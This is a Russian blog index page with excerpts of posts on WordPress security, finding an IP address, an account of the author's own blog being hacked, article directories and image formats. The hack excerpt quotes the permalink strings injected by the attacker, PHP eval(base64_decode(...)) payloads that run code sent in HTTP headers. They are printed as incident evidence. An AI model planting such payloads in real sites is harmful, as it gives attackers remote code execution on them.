Недавние заметки

Как защитить блог WordPress от взлома

Большинство сайтов и блогов взламываются автоматически, т.е. без прямого участия взломщика. Специальные скрыпты и программы (вирусы) находят уязвимости в системах управления и скриптах сайта, подбирают простые пароли к учетным записям администратора, воруют пароли с помощью троянов и клавиатурных шпионов. Конечно, от всего не убережешься, но если соблюдать несколько простых правил, можно процентов на 90 уменьшить вероятность взлома своего блога. После взлома этого блога я очень забочусь о безопасности :).

Защита блога от взлома

Как защитить блог от взлома:

1. Придумать или сгенерировать уникальные сложные пароли для разных сайтов.
Хороший пароль не должен быть похож на осмысленное слово или словосочетание, в нем должны быть спецсимволы, цифры и буквы разных регистров. Такие пароли сложно запомнить, потому их лучше записать на бумаге или использовать для этого специальные программы, которые хранят пароли в зашифрованном виде.

2. Настроить программу хранения паролей в зашифрованном виде.
Конечно, пароли можно хранить в блокноте на рабочем столе. Очень удобно, но очень небезопасно. Рано или поздно ваш компьютер подцепит какую-то заразу и все ваши пароли могут стать достоянием общественности.

У меня был такой файлик и я знаю, как тяжело избавиться от привычки хранить пароли в одном месте в открытом виде. Но в один прекрасный день, после 2х суток исправления последствий заражения моих сайтов злым вирусом по FTP, я потратил 3 часа на установку и переписывание обновленных паролей в специальную программу, которая хранит пароли в зашифрованном виде. Заодно перестал хранить пароли к ftp в Total Commander. Да, нудно и неудобно, зато с тех пор мои пароли не воровались. Нервные клетки мне очень благодарны.

Программ для хранения зашифрованных паролей очень много, есть платные, есть бесплатные. Не буду писать, какой программой пользуюсь я — чем меньше потенциальные взломщики знают о вашей защите, тем лучше ;).

Читать дальше…

Как узнать IP-адрес своего компьютера

Узнать свой IP («ай-пи») можно множеством способов. Предлагаю три из них, пользуйтесь тем, который вам удобнее (лично мне удобнее 3-м). Также вы можете прочитать об этом здесь.

Способ №1. Заходим на сайт, который определяет IP вашего компьютера

Можно зайти на сайт или форум, на котором установлен код определения IP-адреса посетителя. Например, на специальную страничку Яндекса или на сайт smart-ip.net. Можно поискать и другие сайты, определяющие IP адрес вашего компьютера, вбив в строку поиска запрос типа «адрес сайта который определяет IP».

Способ №2. Узнаем IP в свойствах подключения к интернету.

Адрес IP можно посмотреть в свойствах своего подключения к интернету. Для Windows XP нужно сделать следующее:

1. Открываем Пуск->Панель управления->Сетевые подключения.

2. Находим ярлычок подключения к интернету и дважды по нему кликаем.

3. В открывшемся окне переходим на вторую закладку «Сведения»:

IP-адрес в свойствах подключения к интернету

Самая нижняя строка и будет вашим IP-адресом.

Читать дальше…

Взлом моего блога через уязвимость WordPress

Скупой платит дважды, а ленивый работает в два раза больше. Об этом я вспомнил, когда мой блог стал очередной жертвой уязвимости в движке WordPress 2.8, устраненной только в версии WordPress 2.8.4. Благодаря этой дыре можно удаленно изменить пароль администратора блога WordPress, получив тем самым полный доступ к админке блога. Как что не стоит лениться обновлять движок до последней версии – спокойнее спаться будет.

В принципе, скрипт, получивший доступ к админке моего блога, не сделал ничего страшного. Или просто не успел сделать. Ко всем ссылкам на статьи блога дописывалось что-то вроде

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
и
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Этот код делал почти все ссылки блога мертвыми, переходы на посты не работали. Я перезалил шаблоны из последнего бэкапа, обновил движок WordPress, но ссылки не стали прежними. Файл .htaccess тоже был в порядке. Подозрение, что взломан хостинг, тоже не оправдались. И только просматривая параметры постоянных ссылок (Администрирование->Параметры->Постоянные ссылки) блога, я с удивлением заметил следующее:

Изменение шаблона ссылки в результате взлома WordPress

Читать дальше…

Свежий список белых каталогов статей, в которые можно бесплатно добавить свою статью и ее проиндексирует Яндекс

Полгода назад, еще в феврале, я решил попробовать добавить свои статьи со ссылками на свой блог в белые каталоги статей. Т.е. в каталоги, которые размещают у себя статьи бесплатно и не требуют обратную ссылку с моего сайта. Заодно провел свой личный эксперимент, насколько это эффективно и сколько добавленных мной размноженных статей проиндексирует Яндекс.

Каталоги для размещения своих статей я искал поиском по ключевику белый каталог статей добавить бесплатно, а также в списках статейных каталогов, которые кочуют из блога в блог. Как правило, большинство из этих ссылок давно неактуальны, а свежие списки каталогов статей никто составлять не хочет… Копаться в мертвых ссылках каталогов нудное и неблагодарное занятие, но тяга к шаре неистребима.
Читать дальше…

Чем отличается GIF от JPG. Разница между популярными графическими форматами

Для графики в интернете есть 2 основных требования: картинка должна быть максимально возможного качества и в тоже время она должна быстро загружаться. Когда интернет был дорогим и медленным, важнее была скорость загрузки фотографии, сейчас же более важно качество и отсутствие искажений на ней. Но, как и прежде, основными графическими форматами в интернете остаются GIF и JPG (JPEG).

Оба эти формата обеспечивают максимальное качество хранимой информации при ее минимально возможном объеме, т.е. скорости загрузки на компьютер пользователя сети. Разница между форматами GIF и JPG состоит в том, что они ужимают и хорошо показывают информацию разных типов.

Формат JPG (JPEG) лучше всего подходит для того, чтобы хранить фотографии, картины, яркие рисунки с плавным переходом одного цвета в другой (градиенты). Сохраняя информацию в формате JPEG, вы сами определяете, что вам важнее – четкость и достоверность графики или скорость, с которой ваши фотографии смогут отправляться по почте или загружаться с online-фотоальбомов и блогов.

Пример графики, которую нужно сохранять в JPG:

Фото нужно сохранять в jpg

Формат GIF предназначен для хранения одноцветных или черно-белых рисунков, схем, иконок, логотипов, флажков и т.п. Если цветов и оттенков на рисунке меньше, чем 256 и при этом важна четкость линий и равномерность цвета, картинку следуют сохранять в формате GIF.

Читать дальше…

Почему я не люблю разбираться в чужом коде

У каждого человека есть свой стиль верстки. Плохой или хороший – не важно, но он другой. Любой человек может писать как оригинальный оптимальный код в одном месте, так и непонятный избыточный в другом. Настроение у него было такое или пробелы в знаниях не позволяют одинаково легко делать выпадающие менюшки и правильно вставлять flash ролики. А комментировать свой код HTML утруждаются немногие.

Разбираться в чужом HTML коде

Читать дальше…